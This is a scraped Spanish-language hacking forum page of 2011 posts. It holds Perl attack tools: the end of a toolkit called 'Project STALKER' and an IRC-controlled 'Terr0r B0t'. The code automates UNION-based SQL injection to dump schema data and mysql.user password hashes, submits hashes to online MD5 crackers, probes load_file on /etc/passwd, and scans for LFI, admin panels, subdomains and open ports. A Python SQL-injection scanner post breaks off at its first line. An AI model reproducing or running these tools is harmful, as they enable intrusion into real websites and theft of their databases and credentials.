$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}
sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2");
print "[$_[1]] : $1 [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
sub ascii {
return join ',',unpack "U*",$_[0];
}
sub base {
$re = encode_base64($_[0]);
chomp $re;
return $re;
}
sub base_de {
$re = decode_base64($_[0]);
chomp $re;
return $re;
}
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}
sub hex_en {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}
sub hex_de {
my $text = shift;
$text =~ s/^0x//;
$encode = join q[], map { chr hex } $text =~ /../g;
return $encode;
}
sub ascii_de {
my $text = shift;
$text = join q[], map { chr } split q[,],$text;
return $text;
}
sub getprocess {
my %procesos;
my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");
foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}
sub killprocess {
my ($numb,$pid) = @_;
if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}
sub getip {
my $get = gethostbyname($_[0]);
return inet_ntoa($get);
}
sub crackit {
my $secret = $_[0];
print "[+] Cracking $_[0]\n\n";
my %hash = (
'http://passcracking.com/' => {
'tipo' => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);
for my $data(keys %hash) {
if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n";
}
sub ftp {
my ($ftp,$user,$pass) = @_;
if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {
print "\n[+] Enter of the server FTP\n\n";
menu:
print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";
if ($cmd=~/help/) {
print q(
help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??
);
}
if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}
if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/exit/ig) {
next;
}
if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}
if ($cmd=~/quit/) {
next;
}
goto menu;
} else {
print "\n[-] Failed the login\n\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}
sub scanpaths {
my $urla = $_[0];
print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag) = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}
print "\n\n[+] Finish\n";
}
sub scanport {
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);
print "[+] Scanning $_[0]\n\n\n";
for my $port(keys %ports) {
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}
sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
my @founds = repes(@founds);
return @founds;
}
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}
sub get_links {
my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
sub head {
cprint "\x0311"; #13
print "\n\n-- == Project STALKER == --\n\n";
cprint "\x030";
}
sub copyright {
cprint "\x0311"; #13
print"\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x030";
}
sub toma {
return $nave->get($_[0])->content;
}
sub tomax {
return $nave->get($_[0]);
}
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
sub conectar {
my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout => 5);
print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}
sub enter {
my ($host,$user,$pass) = @_;
print "[+] Connecting to the server\n";
$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
print "\n[+] Enter in the database";
while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);
if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}
$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();
my @columnas = @{$re->{NAME}};
if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}
sub saveyes {
open (SAVE,">>".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}
sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}
sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}
sub helpme {
cprint "\x0310"; #13
print qq(
Commands :
getinfo
getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command>
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
cprint "\x030";
}
#
# The End ?
#
#506
Scripting / [Perl] Terr0r B0t By Doddy H
7 Octubre 2011, 15:55 PM
Hola a todos.
Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :
* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI (busca numero de columnas y da info)
* Tool para explotar LFI
Comandos para el bot en el canal
Forma de uso :
Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :
* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI (busca numero de columnas y da info)
* Tool para explotar LFI
Comandos para el bot en el canal
Código [Seleccionar]
!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='
Forma de uso :
Código [Seleccionar]
C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl
[+] tERR0R b0T (c) dODDy HacKMaN 2010
[+] Starting the bot
[+] Online
Código (perl) [Seleccionar]
#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#
use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;
@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');
my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";
my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC
print "[+] Starting the bot\n";
my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );
if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}
print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";
print "[+] Online\n\n";
while ( my $log = <$soquete> ) {
chomp($log);
if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}
if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}
if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}
if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}
if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}
sub lfi {
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}
sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}
sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) {
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}
sub scan2 {
my $rows = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}
sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}
sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}
sub ascii {
return join ',',unpack "U*",$_[0];
}
sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}
sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}
sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}
sub toma {
return $nave->request (GET $_[0])->content;
}
sub tomax {
return $nave->request (GET $_[0]);
}
#The End
#507
Foro Libre / Re: Vuestro juego de la infancia es...
7 Octubre 2011, 02:53 AM
Millones , pero el unico del que me acuerdo el nombre es Captain Claw.
#508
Scripting / Re: Como me hago un mIRC propio en python?
7 Octubre 2011, 02:02 AM
es complicado , tenes que saber los comandos necesarios como el tipico ping pong u otros , ademas no se me ocurre como hacer en un while una deteccion de los mensajes privados que te puedan enviar , desde mi punto de vista es complicado , pero por lo que leido es muy facil de hacerlo en delphi.
Eso si si lo que queres hacer es un bot y no un cliente la cosa es diferente
Eso si si lo que queres hacer es un bot y no un cliente la cosa es diferente
#509
Scripting / [Python] SQL Scanner 0.3
7 Octubre 2011, 01:40 AM
Bueno este es un simple scanner en python que hice para SQLI
Con las sig opciones :
Con las sig opciones :
- Verifica vulnerabilidad
- Busca columnas
- Busca el numero milagroso y saca info sobre la DB
- Saca tablas y columnas de de la DB actual o otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logsCódigo (python) [Seleccionar]
#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010
import os,sys,urllib2,re,binascii
from urlparse import urlparse
def clean():
